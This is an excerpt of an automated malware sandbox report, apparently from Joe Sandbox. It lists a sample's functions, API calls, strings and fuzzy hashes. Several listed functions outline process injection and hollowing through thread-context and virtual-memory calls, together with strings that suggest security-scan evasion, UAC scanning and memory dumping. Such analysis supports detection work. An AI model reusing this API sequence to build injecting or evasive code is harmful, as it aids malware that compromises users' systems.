                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileWrite
                                                                      • String ID:
                                                                      • API String ID: 3934441357-0
                                                                      • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                      • Instruction ID: fee4537568e5cd07a94eba6dc9cebebaf388791b46c6a607004a8840d0025864
                                                                      • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                      • Instruction Fuzzy Hash: 6CD05BB23091507BE624965A6D48EB76BDCCBC6770F10063DF558C7180D7208C05C671
                                                                      Function 02C94C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString
                                                                      • String ID:
                                                                      • API String ID: 3341692771-0
                                                                      • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                      • Instruction ID: 85086168871f69ace5433ef1dc153993f1074ae625370b18a7c3aa332c0cebb1
                                                                      • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                      • Instruction Fuzzy Hash: AAC080B2600A305FFF355699ACC875263CCDF453D8F1800A1D405D7255E360DD00D7B0
                                                                      Function 02C97E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02CB356F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,Initialize), ref: 02C97E8B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                      • Instruction ID: d610a13627caf328f265378df94b1de123524fbdb2e67bbaa1706dea73dd7959
                                                                      • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                      • Instruction Fuzzy Hash: 79C08CF26226000E1E60A6BC1CCC219628D1BC41387601E21E438CA3C1D326982B3820
                                                                      Function 02C97E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                      • Instruction ID: e8bbb1a2f9f0097a5e9dfd4cece4e5ab6f3d734017acf5c30ca7bde1f7c3ef88
                                                                      • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                                      • Instruction Fuzzy Hash: 02C08CF02222000E5E6466BC2CCC249628E0B842387640A21A43CC62E2D33A98AB3810
                                                                      Function 02CBC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • timeSetEvent.WINMM(00002710,00000000,02CBC350,00000000,00000001), ref: 02CBC36C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Eventtime
                                                                      • String ID:
                                                                      • API String ID: 2982266575-0
                                                                      • Opcode ID: e8241fa6c9a2fa9856575efb70220218ae34cab103894cf5f05e5b09ea06ce48
                                                                      • Instruction ID: ef309483eb34946cb755f0328eed241480609b133e0bf457392a2e02df4edf29
                                                                      • Opcode Fuzzy Hash: e8241fa6c9a2fa9856575efb70220218ae34cab103894cf5f05e5b09ea06ce48
                                                                      • Instruction Fuzzy Hash: 96C048F27903002AFA1196AA9CC2FB6169DE709B10F940416F608AA2D1D2A35AA05E68
                                                                      Function 02C94C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02C94C3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocString
                                                                      • String ID:
                                                                      • API String ID: 2525500382-0
                                                                      • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                      • Instruction ID: 12906513031f3abd4a2d03763fa567b067c67633976d072eaf8c3e6c79461699
                                                                      • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                                      • Instruction Fuzzy Hash: 5EB09235208A0229EE2C26620E09736004D1B8128AF8800519E18C80D0EA40C102D836
                                                                      Function 02C94C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02C94C57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString
                                                                      • String ID:
                                                                      • API String ID: 3341692771-0
                                                                      • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                      • Instruction ID: 2fda48204c7871f486f4a9e8c6a02d2675efd400fa8b933601ed7aec264498b4
                                                                      • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                      • Instruction Fuzzy Hash: 06A011B8008A030A8E2A3228002802A2A222FC0280388C0A882000A00A8A2A8002A820
                                                                      Function 02C915CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02C91A03,?,02C91FC1), ref: 02C915E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: d7f8610d87162dd0ddb34bdc3b589d3d6431b20dcbc9859cfca5eb06fd32ebfc
                                                                      • Instruction ID: 1c1bbd99c19d7ab5642a5f495e72e1c68a6604ce310ca5c99b3bf562c37f426a
                                                                      • Opcode Fuzzy Hash: d7f8610d87162dd0ddb34bdc3b589d3d6431b20dcbc9859cfca5eb06fd32ebfc
                                                                      • Instruction Fuzzy Hash: C9F06DF0B413016FDB0ADFB9A9457017BE2EB8B344F148579D609DB788E7B18802CB80
                                                                      Function 02C91682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02C91FC1), ref: 02C916A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 46f8d7c8e4d2c581d5b7f610326bb0e9426334d32c740506c526deab87ddc408
                                                                      • Instruction ID: c4a8cebcd3166292355e39ff5eb7627af556b79a7855a0b3500b1055d2442b3e
                                                                      • Opcode Fuzzy Hash: 46f8d7c8e4d2c581d5b7f610326bb0e9426334d32c740506c526deab87ddc408
                                                                      • Instruction Fuzzy Hash: D6F090B2A446967BDB119E5A9C85782BB98FB40314F090139F90897B40D7B0EC11CBD4
                                                                      Function 02C916E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02C91FE4), ref: 02C91704
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeVirtual
                                                                      • String ID:
                                                                      • API String ID: 1263568516-0
                                                                      • Opcode ID: d6c2458312347aa595fb689e2abe1dbf453eeb0f6dbee42a553ddb2efc2b5c48
                                                                      • Instruction ID: 64524e9809249ef640c9872a7b3220e1a98271b0916244c08c91b7a5745c09b6
                                                                      • Opcode Fuzzy Hash: d6c2458312347aa595fb689e2abe1dbf453eeb0f6dbee42a553ddb2efc2b5c48
                                                                      • Instruction Fuzzy Hash: D0E086753003036FDF105A7A5D497126BDCEB45664F1C4475F509DB281D2E0E8108B60

                                                                      Non-executed Functions

                                                                      Function 02CAAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02CAADA3,?,?,02CAAE35,00000000,02CAAF11), ref: 02CAAB30
                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02CAAB48
                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02CAAB5A
                                                                      • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02CAAB6C
                                                                      • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02CAAB7E
                                                                      • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02CAAB90
                                                                      • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02CAABA2
                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02CAABB4
                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02CAABC6
                                                                      • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02CAABD8
                                                                      • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02CAABEA
                                                                      • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02CAABFC
                                                                      • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02CAAC0E
                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02CAAC20
                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02CAAC32
                                                                      • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02CAAC44
                                                                      • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02CAAC56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule
                                                                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                      • API String ID: 667068680-597814768
                                                                      • Opcode ID: 78b15379d64f63c4ab6ab00c898274885e914043d5bd48f4a1c6bf05448c387a
                                                                      • Instruction ID: ecaab94babde7639bab70f1c154beb67c791ffeada471e2d7f01e2ba3a34450c
                                                                      • Opcode Fuzzy Hash: 78b15379d64f63c4ab6ab00c898274885e914043d5bd48f4a1c6bf05448c387a
                                                                      • Instruction Fuzzy Hash: 2331E2F1E80B51AFFF00EFB4D898A2977BDAB16709B100D61A802DF664E775A811DF11
                                                                      Function 02CA8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                      • GetThreadContext.KERNEL32(00000000,02D17424,ScanString,02D173A8,02CAA93C,UacInitialize,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,UacInitialize,02D173A8), ref: 02CA9602
                                                                        • Part of subcall function 02CA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      • SetThreadContext.KERNEL32(00000000,02D17424,ScanBuffer,02D173A8,02CAA93C,ScanString,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,00000000,-00000008,02D174FC,00000004,02D17500), ref: 02CAA317
                                                                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02D17424,ScanBuffer,02D173A8,02CAA93C,ScanString,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,00000000,-00000008,02D174FC), ref: 02CAA324
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                      • API String ID: 2624078988-51457883
                                                                      • Opcode ID: 660751cc9f5b0e9e4a3a31d498074bb1e53572a665833ee8cb8426f7abb30d39
                                                                      • Instruction ID: 5480a0d5a82d10d3e71d5b8d236639d0e7fbf1ef3c8fc00116ae551addade91b
                                                                      • Opcode Fuzzy Hash: 660751cc9f5b0e9e4a3a31d498074bb1e53572a665833ee8cb8426f7abb30d39
                                                                      • Instruction Fuzzy Hash: A1E21A75A401199FDF25FB64DC99BCFB3BABF84304F5041A2E009AB214DA30AE46EF55
                                                                      Function 02CA8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                      • GetThreadContext.KERNEL32(00000000,02D17424,ScanString,02D173A8,02CAA93C,UacInitialize,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,UacInitialize,02D173A8), ref: 02CA9602
                                                                        • Part of subcall function 02CA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                      • API String ID: 4276370345-51457883
                                                                      • Opcode ID: a79373f9c4f42e031720d888a3e78dbfb4566df5099226c0bd44585c237e4c7e
                                                                      • Instruction ID: d0d3636375aeeb7189b7af9846b97344ec8e3583e3b67e00ba67d0ea806feae0
                                                                      • Opcode Fuzzy Hash: a79373f9c4f42e031720d888a3e78dbfb4566df5099226c0bd44585c237e4c7e
                                                                      • Instruction Fuzzy Hash: F6E21B75A401199FDF25FB64DC99BCFB3BABF84304F5041A2E009AB214DA30AE46EF55
                                                                      Function 02C95908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95925
                                                                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C9593C
                                                                      • lstrcpynA.KERNEL32(?,?,?), ref: 02C9596C
                                                                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C959D0
                                                                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A06
